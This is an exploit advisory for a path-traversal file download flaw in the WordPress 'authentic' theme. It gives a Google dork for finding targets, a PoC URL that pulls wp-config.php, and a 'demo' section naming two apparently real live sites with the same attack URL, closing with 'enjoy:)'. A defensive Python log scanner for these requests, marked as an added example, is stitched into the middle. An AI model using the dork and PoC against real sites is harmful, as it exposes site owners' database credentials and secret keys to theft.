
WordPress authentic <= Arbitrary File Download

Author: wlhaan hacker, Published: 09-10-2014
######################

# Exploit Title : WordPress authentic <= Arbitrary File Download



# Exploit Author : wlhaan hacker



# Vendor Homepage : https://www.authenticthemes.com/


dork

inurl:"wp-content/themes/authentic/"



# Tested on : Windows 7 / Mozilla Firefox

Linux / Mozilla Firef


######################



# PoC



http://victim/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
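A log check for the request shape shown in the PoC, as an added example that is not part of the original advisory: it scans web server access logs for hits on the theme's `download.php` whose `file` parameter leaves its directory. The Combined Log Format layout, the sample log lines, and the function names are assumptions made for this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path taken from the advisory's PoC URL.
VULN_PATH = "/wp-content/themes/authentic/includes/download.php"
# Assumed log layout: Combined Log Format (ip ... "METHOD target HTTP/x" status ...).
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "GET /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.7 - - [10/Oct/2014:13:55:40 +0000] "GET /wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 199',
    '198.51.100.4 - - [10/Oct/2014:14:01:02 +0000] "GET /wp-content/themes/authentic/includes/download.php?file=brochure.pdf HTTP/1.1" 200 48213',
    '198.51.100.4 - - [10/Oct/2014:14:01:09 +0000] "GET /index.php?file=../x HTTP/1.1" 200 512',
]

def fully_decode(value, rounds=3):
    """Percent-decode until stable so encoded separators are normalized."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_param):
    """True if the value is absolute or contains a '..' path segment."""
    p = fully_decode(file_param).replace("\\", "/")
    if p.startswith("/") or re.match(r"^[A-Za-z]:", p):
        return True
    return ".." in p.split("/")

def scan(lines):
    """Return one finding per traversing request to the theme's download.php."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if posixpath.normpath(fully_decode(url.path)).lower() != VULN_PATH:
            continue
        for value in parse_qs(url.query).get("file", []):
            if is_traversal(value):
                findings.append({"ip": m["ip"], "file": fully_decode(value), "served": m["status"] == "200"})
    return findings
```

A finding with `served` set to true on a request for `wp-config.php` means the database credentials and secret keys in that file should be treated as exposed and rotated.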


# demo

http://www.pillarhoodriver.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php

http://warrenalliance.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php


enjoy:)

#####################
Discovered By : wlhaan hacker



https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani

#####################
